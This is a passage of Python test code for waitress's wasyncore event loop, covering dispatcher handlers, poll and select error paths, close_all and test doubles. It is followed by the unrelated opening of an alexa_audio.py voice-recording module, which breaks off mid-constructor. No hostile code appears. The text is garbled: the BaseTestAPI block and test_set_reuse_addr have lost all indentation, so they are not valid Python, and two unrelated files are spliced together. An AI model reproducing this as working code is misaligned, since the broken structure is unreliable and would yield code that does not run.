        os.close(fd)

        w.write(d1)
        w.send(d2)
        w.close()
        with open(TESTFN, "rb") as file:
            self.assertEqual(file.read(), self.d + d1 + d2)

    @unittest.skipUnless(
        hasattr(asyncore, "file_dispatcher"), "asyncore.file_dispatcher required"
    )
    def test_dispatcher(self):
        fd = os.open(TESTFN, os.O_RDONLY)
        data = []

        class FileDispatcher(asyncore.file_dispatcher):
            def handle_read(self):
                data.append(self.recv(29))

        FileDispatcher(fd)
        os.close(fd)
        asyncore.loop(timeout=0.01, use_poll=True, count=2)
        self.assertEqual(b"".join(data), self.d)

    def test_resource_warning(self):
        # Issue #11453
        got_warning = False
        while got_warning is False:
            # we try until we get the outcome we want because this
            # test is not deterministic (gc_collect() may not collect the
            # wrapper, and thus not emit the ResourceWarning, on every pass)
            fd = os.open(TESTFN, os.O_RDONLY)
            f = asyncore.file_wrapper(fd)
            os.close(fd)
            try:
                with check_warnings(("", ResourceWarning)):
                    f = None
                    gc_collect()
            except AssertionError:  # pragma: no cover
                pass
            else:
                got_warning = True

    def test_close_twice(self):
        fd = os.open(TESTFN, os.O_RDONLY)
        f = asyncore.file_wrapper(fd)
        os.close(fd)

        os.close(f.fd)  # file_wrapper dupped fd
        with self.assertRaises(OSError):
            f.close()

        self.assertEqual(f.fd, -1)
        # calling close twice should not fail
        f.close()
class BaseTestHandler(asyncore.dispatcher):  # pragma: no cover
    """Dispatcher base for API tests: every event handler fails loudly
    unless a subclass overrides it; `flag` signals test completion."""

    def __init__(self, sock=None):
        asyncore.dispatcher.__init__(self, sock)
        # Set to True by subclasses when the awaited event fired.
        self.flag = False

    def handle_accept(self):
        raise Exception("handle_accept not supposed to be called")

    def handle_accepted(self):
        raise Exception("handle_accepted not supposed to be called")

    def handle_connect(self):
        raise Exception("handle_connect not supposed to be called")

    def handle_expt(self):
        raise Exception("handle_expt not supposed to be called")

    def handle_close(self):
        raise Exception("handle_close not supposed to be called")

    def handle_error(self):
        # Re-raise instead of swallowing, so test failures surface.
        raise
class BaseServer(asyncore.dispatcher):
    """A server which listens on an address and dispatches the
    connection to a handler.
    """

    def __init__(self, family, addr, handler=BaseTestHandler):
        asyncore.dispatcher.__init__(self)
        self.create_socket(family)
        self.set_reuse_addr()
        bind_af_aware(self.socket, addr)
        self.listen(5)
        self.handler = handler

    @property
    def address(self):
        # Actual bound address (port is OS-assigned for (HOST, 0)).
        return self.socket.getsockname()

    def handle_accepted(self, sock, addr):
        # Hand each accepted connection to a new handler instance.
        self.handler(sock)

    def handle_error(self):  # pragma: no cover
        raise
class BaseClient(BaseTestHandler):
    """Test client that connects to *address* on construction."""

    def __init__(self, family, address):
        BaseTestHandler.__init__(self)
        self.create_socket(family)
        self.connect(address)

    def handle_connect(self):
        # Connecting is expected; do nothing (base class would raise).
        pass
class BaseTestAPI:
def tearDown(self):
asyncore.close_all(ignore_all=True)
def loop_waiting_for_flag(self, instance, timeout=5): # pragma: no cover
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_accepted(self):
# make sure handle_accepted() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
asyncore.dispatcher.handle_accept(self)
def handle_accepted(self, sock, addr):
sock.close()
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send(b"x" * 1024)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
# in order to make handle_close be called we are supposed
# to make at least one recv() call
self.recv(1024)
def handle_close(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close_after_conn_broken(self):
# Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and
# #11265).
data = b"\0" * 128
class TestClient(BaseClient):
def handle_write(self):
self.send(data)
def handle_close(self):
self.flag = True
self.close()
def handle_expt(self): # pragma: no cover
# needs to exist for MacOS testing
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def handle_read(self):
self.recv(len(data))
self.close()
def writable(self):
return False
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
@unittest.skipIf(
sys.platform.startswith("sunos"), "OOB support is broken on Solaris"
)
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
if sys.platform == "darwin" and self.use_poll: # pragma: no cover
self.skipTest("poll may fail on macOS; see issue #28087")
class TestClient(BaseClient):
def handle_expt(self):
self.socket.recv(1024, socket.MSG_OOB)
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(chr(244).encode("latin-1"), socket.MSG_OOB)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else: # pragma: no cover
raise Exception("exception not raised")
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_connection_attributes(self):
server = BaseServer(self.family, self.addr)
client = BaseClient(self.family, server.address)
# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
# self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(self.family)
# self.assertEqual(s.socket.type, socket.SOCK_STREAM)
self.assertEqual(s.socket.family, self.family)
self.assertEqual(s.socket.gettimeout(), 0)
# self.assertFalse(s.socket.get_inheritable())
    def test_bind(self):
        """bind() must actually claim the port: a second bind on the same
        port has to fail with EADDRINUSE."""
        if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
            self.skipTest("Not applicable to AF_UNIX sockets.")
        s1 = asyncore.dispatcher()
        s1.create_socket(self.family)
        s1.bind(self.addr)
        s1.listen(5)
        port = s1.socket.getsockname()[1]
        s2 = asyncore.dispatcher()
        s2.create_socket(self.family)
        # EADDRINUSE indicates the socket was correctly bound
        self.assertRaises(socket.error, s2.bind, (self.addr[0], port))
def test_set_reuse_addr(self): # pragma: no cover
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
with closewrapper(socket.socket(self.family)) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except OSError:
unittest.skip("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket(self.family))
self.assertFalse(
s.socket.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
)
s.socket.close()
s.create_socket(self.family)
s.set_reuse_addr()
self.assertTrue(
s.socket.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
)
    @reap_threads
    def test_quick_connect(self):  # pragma: no cover
        """A blocking client with a short timeout must be able to connect
        while the asyncore loop runs in a background thread."""
        # see: http://bugs.python.org/issue10340
        if self.family not in (socket.AF_INET, getattr(socket, "AF_INET6", object())):
            self.skipTest("test specific to AF_INET and AF_INET6")
        server = BaseServer(self.family, self.addr)
        # run the thread 500 ms: the socket should be connected in 200 ms
        t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1, count=5))
        t.start()
        try:
            sock = socket.socket(self.family, socket.SOCK_STREAM)
            with closewrapper(sock) as s:
                s.settimeout(0.2)
                # SO_LINGER(on, 0): close() sends RST so the server side is
                # torn down immediately
                s.setsockopt(
                    socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1, 0)
                )
                try:
                    s.connect(server.address)
                except OSError:
                    pass
        finally:
            join_thread(t, timeout=TIMEOUT)
class BaseTestAPI_UseIPv4Sockets(BaseTestAPI):
    """Run the BaseTestAPI suite over IPv4 TCP sockets."""

    family = socket.AF_INET
    addr = (HOST, 0)  # port 0: let the OS pick a free port
@unittest.skipUnless(IPV6_ENABLED, "IPv6 support required")
class BaseTestAPI_UseIPv6Sockets(BaseTestAPI):
    """Run the BaseTestAPI suite over IPv6 TCP sockets."""

    family = socket.AF_INET6
    addr = (HOSTv6, 0)  # port 0: let the OS pick a free port
@unittest.skipUnless(HAS_UNIX_SOCKETS, "Unix sockets required")
class BaseTestAPI_UseUnixSockets(BaseTestAPI):
    """Run the BaseTestAPI suite over AF_UNIX sockets."""

    if HAS_UNIX_SOCKETS:
        family = socket.AF_UNIX
    addr = TESTFN  # filesystem path used as the socket address

    def tearDown(self):
        # remove the socket file created during the test
        unlink(self.addr)
        BaseTestAPI.tearDown(self)
class TestAPI_UseIPv4Select(BaseTestAPI_UseIPv4Sockets, unittest.TestCase):
    """IPv4 sockets driven by select()."""

    use_poll = False
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
class TestAPI_UseIPv4Poll(BaseTestAPI_UseIPv4Sockets, unittest.TestCase):
    """IPv4 sockets driven by poll().

    BUG FIX: this class previously inherited BaseTestAPI_UseIPv6Sockets,
    so the IPv4+poll combination was silently never exercised (and the
    IPv6+poll case ran twice).
    """

    use_poll = True
class TestAPI_UseIPv6Select(BaseTestAPI_UseIPv6Sockets, unittest.TestCase):
    """IPv6 sockets driven by select()."""

    use_poll = False
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
class TestAPI_UseIPv6Poll(BaseTestAPI_UseIPv6Sockets, unittest.TestCase):
    """IPv6 sockets driven by poll()."""

    use_poll = True
class TestAPI_UseUnixSocketsSelect(BaseTestAPI_UseUnixSockets, unittest.TestCase):
    """Unix-domain sockets driven by select()."""

    use_poll = False
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
class TestAPI_UseUnixSocketsPoll(BaseTestAPI_UseUnixSockets, unittest.TestCase):
    """Unix-domain sockets driven by poll()."""

    use_poll = True
class Test__strerror(unittest.TestCase):
    """Tests for waitress.wasyncore._strerror."""

    def _callFUT(self, err):
        from waitress.wasyncore import _strerror

        return _strerror(err)

    def test_gardenpath(self):
        # errno 1 is EPERM on every supported platform
        result = self._callFUT(1)
        self.assertEqual(result, "Operation not permitted")

    def test_unknown(self):
        # non-errno input falls back to the generic message
        result = self._callFUT("wut")
        self.assertEqual(result, "Unknown error wut")
class Test_read(unittest.TestCase):
    """Tests for waitress.wasyncore.read: exercise the dispatcher's read
    hook and verify exception routing via DummyDispatcher flags."""

    def _callFUT(self, dispatcher):
        from waitress.wasyncore import read
        return read(dispatcher)
    def test_gardenpath(self):
        inst = DummyDispatcher()
        self._callFUT(inst)
        self.assertTrue(inst.read_event_handled)
        self.assertFalse(inst.error_handled)
    def test_reraised(self):
        # ExitNow must propagate out of read(), not be swallowed
        from waitress.wasyncore import ExitNow
        inst = DummyDispatcher(ExitNow)
        self.assertRaises(ExitNow, self._callFUT, inst)
        self.assertTrue(inst.read_event_handled)
        self.assertFalse(inst.error_handled)
    def test_non_reraised(self):
        # ordinary OSError is routed to handle_error()
        inst = DummyDispatcher(OSError)
        self._callFUT(inst)
        self.assertTrue(inst.read_event_handled)
        self.assertTrue(inst.error_handled)
class Test_write(unittest.TestCase):
    """Tests for waitress.wasyncore.write: mirror image of Test_read for
    the write event hook."""

    def _callFUT(self, dispatcher):
        from waitress.wasyncore import write
        return write(dispatcher)
    def test_gardenpath(self):
        inst = DummyDispatcher()
        self._callFUT(inst)
        self.assertTrue(inst.write_event_handled)
        self.assertFalse(inst.error_handled)
    def test_reraised(self):
        # ExitNow must propagate out of write()
        from waitress.wasyncore import ExitNow
        inst = DummyDispatcher(ExitNow)
        self.assertRaises(ExitNow, self._callFUT, inst)
        self.assertTrue(inst.write_event_handled)
        self.assertFalse(inst.error_handled)
    def test_non_reraised(self):
        # ordinary OSError is routed to handle_error()
        inst = DummyDispatcher(OSError)
        self._callFUT(inst)
        self.assertTrue(inst.write_event_handled)
        self.assertTrue(inst.error_handled)
class Test__exception(unittest.TestCase):
    """Tests for waitress.wasyncore._exception (the OOB/exceptional
    condition hook)."""

    def _callFUT(self, dispatcher):
        from waitress.wasyncore import _exception
        return _exception(dispatcher)
    def test_gardenpath(self):
        inst = DummyDispatcher()
        self._callFUT(inst)
        self.assertTrue(inst.expt_event_handled)
        self.assertFalse(inst.error_handled)
    def test_reraised(self):
        # ExitNow must propagate out of _exception()
        from waitress.wasyncore import ExitNow
        inst = DummyDispatcher(ExitNow)
        self.assertRaises(ExitNow, self._callFUT, inst)
        self.assertTrue(inst.expt_event_handled)
        self.assertFalse(inst.error_handled)
    def test_non_reraised(self):
        # ordinary OSError is routed to handle_error()
        inst = DummyDispatcher(OSError)
        self._callFUT(inst)
        self.assertTrue(inst.expt_event_handled)
        self.assertTrue(inst.error_handled)
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
class Test_readwrite(unittest.TestCase):
    """Tests for waitress.wasyncore.readwrite: map poll() flag bits to the
    correct dispatcher hook and check error routing."""

    def _callFUT(self, obj, flags):
        from waitress.wasyncore import readwrite
        return readwrite(obj, flags)
    def test_handle_read_event(self):
        flags = 0
        flags |= select.POLLIN
        inst = DummyDispatcher()
        self._callFUT(inst, flags)
        self.assertTrue(inst.read_event_handled)
    def test_handle_write_event(self):
        flags = 0
        flags |= select.POLLOUT
        inst = DummyDispatcher()
        self._callFUT(inst, flags)
        self.assertTrue(inst.write_event_handled)
    def test_handle_expt_event(self):
        flags = 0
        flags |= select.POLLPRI
        inst = DummyDispatcher()
        self._callFUT(inst, flags)
        self.assertTrue(inst.expt_event_handled)
    def test_handle_close(self):
        flags = 0
        flags |= select.POLLHUP
        inst = DummyDispatcher()
        self._callFUT(inst, flags)
        self.assertTrue(inst.close_handled)
    def test_socketerror_not_in_disconnected(self):
        # EALREADY is not a "disconnected" errno -> goes to handle_error()
        flags = 0
        flags |= select.POLLIN
        inst = DummyDispatcher(socket.error(errno.EALREADY, "EALREADY"))
        self._callFUT(inst, flags)
        self.assertTrue(inst.read_event_handled)
        self.assertTrue(inst.error_handled)
    def test_socketerror_in_disconnected(self):
        # ECONNRESET is a "disconnected" errno -> goes to handle_close()
        flags = 0
        flags |= select.POLLIN
        inst = DummyDispatcher(socket.error(errno.ECONNRESET, "ECONNRESET"))
        self._callFUT(inst, flags)
        self.assertTrue(inst.read_event_handled)
        self.assertTrue(inst.close_handled)
    def test_exception_in_reraised(self):
        from waitress import wasyncore
        flags = 0
        flags |= select.POLLIN
        inst = DummyDispatcher(wasyncore.ExitNow)
        self.assertRaises(wasyncore.ExitNow, self._callFUT, inst, flags)
        self.assertTrue(inst.read_event_handled)
    def test_exception_not_in_reraised(self):
        flags = 0
        flags |= select.POLLIN
        inst = DummyDispatcher(ValueError)
        self._callFUT(inst, flags)
        self.assertTrue(inst.error_handled)
class Test_poll(unittest.TestCase):
    """Tests for waitress.wasyncore.poll (select()-based loop iteration).

    These monkey-patch module attributes by hand and restore them in
    ``finally`` instead of using mock.patch.
    """

    def _callFUT(self, timeout=0.0, map=None):
        from waitress.wasyncore import poll
        return poll(timeout, map)
    def test_nothing_writable_nothing_readable_but_map_not_empty(self):
        # manual monkey-patch of wasyncore.time; restored in finally
        dummy_time = DummyTime()
        map = {0: DummyDispatcher()}
        try:
            from waitress import wasyncore
            old_time = wasyncore.time
            wasyncore.time = dummy_time
            result = self._callFUT(map=map)
        finally:
            wasyncore.time = old_time
        self.assertEqual(result, None)
        # with nothing selectable, poll() sleeps for the timeout instead
        self.assertEqual(dummy_time.sleepvals, [0.0])
    def test_select_raises_EINTR(self):
        # EINTR must be swallowed and the iteration retried/ended cleanly
        dummy_select = DummySelect(select.error(errno.EINTR))
        disp = DummyDispatcher()
        disp.readable = lambda: True
        map = {0: disp}
        try:
            from waitress import wasyncore
            old_select = wasyncore.select
            wasyncore.select = dummy_select
            result = self._callFUT(map=map)
        finally:
            wasyncore.select = old_select
        self.assertEqual(result, None)
        self.assertEqual(dummy_select.selected, [([0], [], [0], 0.0)])
    def test_select_raises_non_EINTR(self):
        # any other select error must propagate
        dummy_select = DummySelect(select.error(errno.EBADF))
        disp = DummyDispatcher()
        disp.readable = lambda: True
        map = {0: disp}
        try:
            from waitress import wasyncore
            old_select = wasyncore.select
            wasyncore.select = dummy_select
            self.assertRaises(select.error, self._callFUT, map=map)
        finally:
            wasyncore.select = old_select
        self.assertEqual(dummy_select.selected, [([0], [], [0], 0.0)])
class Test_poll2(unittest.TestCase):
    """Tests for waitress.wasyncore.poll2 (poll()-based loop iteration),
    using a DummyPollster injected through a patched select module."""

    def _callFUT(self, timeout=0.0, map=None):
        from waitress.wasyncore import poll2
        return poll2(timeout, map)
    def test_select_raises_EINTR(self):
        # EINTR from the pollster must be swallowed
        pollster = DummyPollster(exc=select.error(errno.EINTR))
        dummy_select = DummySelect(pollster=pollster)
        disp = DummyDispatcher()
        map = {0: disp}
        try:
            from waitress import wasyncore
            old_select = wasyncore.select
            wasyncore.select = dummy_select
            self._callFUT(map=map)
        finally:
            wasyncore.select = old_select
        self.assertEqual(pollster.polled, [0.0])
    def test_select_raises_non_EINTR(self):
        # any other poll error must propagate
        pollster = DummyPollster(exc=select.error(errno.EBADF))
        dummy_select = DummySelect(pollster=pollster)
        disp = DummyDispatcher()
        map = {0: disp}
        try:
            from waitress import wasyncore
            old_select = wasyncore.select
            wasyncore.select = dummy_select
            self.assertRaises(select.error, self._callFUT, map=map)
        finally:
            wasyncore.select = old_select
        self.assertEqual(pollster.polled, [0.0])
class Test_dispatcher(unittest.TestCase):
    """Unit tests for waitress.wasyncore.dispatcher, driven entirely
    through ``dummysocket`` test doubles (no real network I/O)."""

    def _makeOne(self, sock=None, map=None):
        from waitress.wasyncore import dispatcher
        return dispatcher(sock=sock, map=map)
    def test_unexpected_getpeername_exc(self):
        sock = dummysocket()
        def getpeername():
            raise OSError(errno.EBADF)
        map = {}
        sock.getpeername = getpeername
        # on failure the dispatcher must not stay registered in the map
        self.assertRaises(socket.error, self._makeOne, sock=sock, map=map)
        self.assertEqual(map, {})
    def test___repr__accepting(self):
        sock = dummysocket()
        map = {}
        inst = self._makeOne(sock=sock, map=map)
        inst.accepting = True
        inst.addr = ("localhost", 8080)
        result = repr(inst)
        expected = "<waitress.wasyncore.dispatcher listening localhost:8080 at"
        self.assertEqual(result[: len(expected)], expected)
    def test___repr__connected(self):
        sock = dummysocket()
        map = {}
        inst = self._makeOne(sock=sock, map=map)
        inst.accepting = False
        inst.connected = True
        inst.addr = ("localhost", 8080)
        result = repr(inst)
        expected = "<waitress.wasyncore.dispatcher connected localhost:8080 at"
        self.assertEqual(result[: len(expected)], expected)
    def test_set_reuse_addr_with_socketerror(self):
        # setsockopt failures must be swallowed by set_reuse_addr()
        sock = dummysocket()
        map = {}
        def setsockopt(*arg, **kw):
            sock.errored = True
            raise OSError
        sock.setsockopt = setsockopt
        sock.getsockopt = lambda *arg: 0
        inst = self._makeOne(sock=sock, map=map)
        inst.set_reuse_addr()
        self.assertTrue(sock.errored)
    def test_connect_raise_socket_error(self):
        # non-zero connect_ex() result must be raised as socket.error
        sock = dummysocket()
        map = {}
        sock.connect_ex = lambda *arg: 1
        inst = self._makeOne(sock=sock, map=map)
        self.assertRaises(socket.error, inst.connect, 0)
    def test_accept_raise_TypeError(self):
        # TypeError from accept() is treated as "nothing to accept"
        sock = dummysocket()
        map = {}
        def accept(*arg, **kw):
            raise TypeError
        sock.accept = accept
        inst = self._makeOne(sock=sock, map=map)
        result = inst.accept()
        self.assertEqual(result, None)
    def test_accept_raise_unexpected_socketerror(self):
        sock = dummysocket()
        map = {}
        def accept(*arg, **kw):
            raise OSError(122)
        sock.accept = accept
        inst = self._makeOne(sock=sock, map=map)
        self.assertRaises(socket.error, inst.accept)
    def test_send_raise_EWOULDBLOCK(self):
        # EWOULDBLOCK means "0 bytes sent", not an error
        sock = dummysocket()
        map = {}
        def send(*arg, **kw):
            raise OSError(errno.EWOULDBLOCK)
        sock.send = send
        inst = self._makeOne(sock=sock, map=map)
        result = inst.send("a")
        self.assertEqual(result, 0)
    def test_send_raise_unexpected_socketerror(self):
        sock = dummysocket()
        map = {}
        def send(*arg, **kw):
            raise OSError(122)
        sock.send = send
        inst = self._makeOne(sock=sock, map=map)
        self.assertRaises(socket.error, inst.send, "a")
    def test_recv_raises_disconnect(self):
        # a disconnect errno from recv() triggers handle_close() and b""
        sock = dummysocket()
        map = {}
        def recv(*arg, **kw):
            raise OSError(errno.ECONNRESET)
        def handle_close():
            inst.close_handled = True
        sock.recv = recv
        inst = self._makeOne(sock=sock, map=map)
        inst.handle_close = handle_close
        result = inst.recv(1)
        self.assertEqual(result, b"")
        self.assertTrue(inst.close_handled)
    def test_close_raises_unknown_socket_error(self):
        sock = dummysocket()
        map = {}
        def close():
            raise OSError(122)
        sock.close = close
        inst = self._makeOne(sock=sock, map=map)
        inst.del_channel = lambda: None
        self.assertRaises(socket.error, inst.close)
    def test_handle_read_event_not_accepting_not_connected_connecting(self):
        # a pending connect must be completed before the read is delivered
        sock = dummysocket()
        map = {}
        inst = self._makeOne(sock=sock, map=map)
        def handle_connect_event():
            inst.connect_event_handled = True
        def handle_read():
            inst.read_handled = True
        inst.handle_connect_event = handle_connect_event
        inst.handle_read = handle_read
        inst.accepting = False
        inst.connected = False
        inst.connecting = True
        inst.handle_read_event()
        self.assertTrue(inst.connect_event_handled)
        self.assertTrue(inst.read_handled)
    def test_handle_connect_event_getsockopt_returns_error(self):
        # SO_ERROR != 0 after connect must raise
        sock = dummysocket()
        sock.getsockopt = lambda *arg: 122
        map = {}
        inst = self._makeOne(sock=sock, map=map)
        self.assertRaises(socket.error, inst.handle_connect_event)
    def test_handle_expt_event_getsockopt_returns_error(self):
        # SO_ERROR != 0 on an exceptional condition closes the channel
        sock = dummysocket()
        sock.getsockopt = lambda *arg: 122
        map = {}
        inst = self._makeOne(sock=sock, map=map)
        def handle_close():
            inst.close_handled = True
        inst.handle_close = handle_close
        inst.handle_expt_event()
        self.assertTrue(inst.close_handled)
    def test_handle_write_event_while_accepting(self):
        # listening sockets ignore write events
        sock = dummysocket()
        map = {}
        inst = self._makeOne(sock=sock, map=map)
        inst.accepting = True
        result = inst.handle_write_event()
        self.assertEqual(result, None)
    def test_handle_error_gardenpath(self):
        sock = dummysocket()
        map = {}
        inst = self._makeOne(sock=sock, map=map)
        def handle_close():
            inst.close_handled = True
        def compact_traceback(*arg, **kw):
            return None, None, None, None
        def log_info(self, *arg):
            inst.logged_info = arg
        inst.handle_close = handle_close
        inst.compact_traceback = compact_traceback
        inst.log_info = log_info
        inst.handle_error()
        self.assertTrue(inst.close_handled)
        self.assertEqual(inst.logged_info, ("error",))
    def test_handle_close(self):
        sock = dummysocket()
        map = {}
        inst = self._makeOne(sock=sock, map=map)
        def log_info(self, *arg):
            inst.logged_info = arg
        def close():
            inst._closed = True
        inst.log_info = log_info
        inst.close = close
        inst.handle_close()
        self.assertTrue(inst._closed)
    def test_handle_accepted(self):
        # the default implementation just closes the accepted socket
        sock = dummysocket()
        map = {}
        inst = self._makeOne(sock=sock, map=map)
        inst.handle_accepted(sock, "1")
        self.assertTrue(sock.closed)
class Test_dispatcher_with_send(unittest.TestCase):
    """Tests for waitress.wasyncore.dispatcher_with_send."""

    def _makeOne(self, sock=None, map=None):
        from waitress.wasyncore import dispatcher_with_send
        return dispatcher_with_send(sock=sock, map=map)
    def test_writable(self):
        # connected + pending output buffer -> writable
        sock = dummysocket()
        map = {}
        inst = self._makeOne(sock=sock, map=map)
        inst.out_buffer = b"123"
        inst.connected = True
        self.assertTrue(inst.writable())
class Test_close_all(unittest.TestCase):
    """Tests for waitress.wasyncore.close_all: which close() exceptions are
    ignored, which propagate."""

    def _callFUT(self, map=None, ignore_all=False):
        from waitress.wasyncore import close_all
        return close_all(map, ignore_all)
    def test_socketerror_on_close_ebadf(self):
        # EBADF (already-closed fd) is ignored and the map emptied
        disp = DummyDispatcher(exc=socket.error(errno.EBADF))
        map = {0: disp}
        self._callFUT(map)
        self.assertEqual(map, {})
    def test_socketerror_on_close_non_ebadf(self):
        disp = DummyDispatcher(exc=socket.error(errno.EAGAIN))
        map = {0: disp}
        self.assertRaises(socket.error, self._callFUT, map)
    def test_reraised_exc_on_close(self):
        # KeyboardInterrupt must never be swallowed
        disp = DummyDispatcher(exc=KeyboardInterrupt)
        map = {0: disp}
        self.assertRaises(KeyboardInterrupt, self._callFUT, map)
    def test_unknown_exc_on_close(self):
        disp = DummyDispatcher(exc=RuntimeError)
        map = {0: disp}
        self.assertRaises(RuntimeError, self._callFUT, map)
class DummyDispatcher:
    """Recording stand-in for a wasyncore dispatcher.

    Each handle_* hook flips the matching ``*_handled`` flag.  If an
    exception (class or instance) was supplied at construction time, the
    read/write/expt hooks and close() raise it after recording the call.
    """

    read_event_handled = False
    write_event_handled = False
    expt_event_handled = False
    error_handled = False
    close_handled = False
    accepting = False

    def __init__(self, exc=None):
        self.exc = exc

    def _raise_if_configured(self):
        # shared tail of the event hooks below
        if self.exc is not None:
            raise self.exc

    def handle_read_event(self):
        self.read_event_handled = True
        self._raise_if_configured()

    def handle_write_event(self):
        self.write_event_handled = True
        self._raise_if_configured()

    def handle_expt_event(self):
        self.expt_event_handled = True
        self._raise_if_configured()

    def handle_error(self):
        self.error_handled = True

    def handle_close(self):
        self.close_handled = True

    def readable(self):
        return False

    def writable(self):
        return False

    def close(self):
        self._raise_if_configured()
class DummyTime:
    """Stand-in for the ``time`` module that records every sleep() call."""

    def __init__(self):
        # values passed to sleep(), in call order
        self.sleepvals = []

    def sleep(self, val):
        self.sleepvals += [val]
class DummySelect:
    """Stand-in for the ``select`` module used by wasyncore's poll loops."""

    # expose the real exception type so callers can catch select.error
    error = select.error

    def __init__(self, exc=None, pollster=None):
        self.exc = exc
        self.pollster = pollster
        # argument tuples from every select() call
        self.selected = []

    def select(self, *arg):
        self.selected.append(arg)
        if self.exc is None:
            return
        raise self.exc

    def poll(self):
        return self.pollster
class DummyPollster:
    """Stand-in for a select.poll() pollster; records poll() timeouts."""

    def __init__(self, exc=None):
        self.exc = exc
        # timeouts passed to poll(), in call order
        self.polled = []

    def poll(self, timeout):
        self.polled.append(timeout)
        if self.exc is None:  # pragma: no cover
            return []
        raise self.exc
|
alexa_audio.py | #!/usr/bin/env python3
import threading
import math
import struct
import time
import alexa_audio_device
import logging
from subprocess import Popen, PIPE, STDOUT
from pocketsphinx import *
DETECT_HYSTERESIS = 1.2 # level should fall lower than the background noise
DETECT_MIN_LENGTH_S = 2.5 # minimal length of a recording, in seconds
DETECT_MAX_LENGTH_S = 10 # maximal length of a recording, in seconds
DETECT_BUFFERS_FOR_INIT = 10 # number of buffers for initialising
class AlexaAudio:
    """Voice front-end: listens for the "alexa" keyword with pocketsphinx,
    records the following phrase, and plays back audio/beeps.

    Audio is mono 16-bit little-endian PCM at 16 kHz throughout.
    """

    def __init__(self, threshold, callback):
        """Set up the audio device, beep buffers, the keyword-spotting
        decoder and start the background processing thread.

        :param threshold: pocketsphinx -kws_threshold for keyword spotting
        :param callback: called (in a new thread) when a phrase is captured
        """
        self.ad = alexa_audio_device.AlexaAudioDevice()
        self.callback = callback
        self.beep_finished_buf = self._beep(150, 1000)
        self.beep_short_buf = self._beep(150, 3000)
        self.beep_failed_buf = self._beep(600, 400)
        self.is_run = True
        self.average = 100.0  # running estimate of background noise level
        self.init_counter = 0
        self.skip = 0  # bytes of input to discard (e.g. our own playback)
        # init pocketsphinx
        # NOTE(review): ``os`` is not imported here; it appears to arrive via
        # ``from pocketsphinx import *`` — confirm, or add ``import os``.
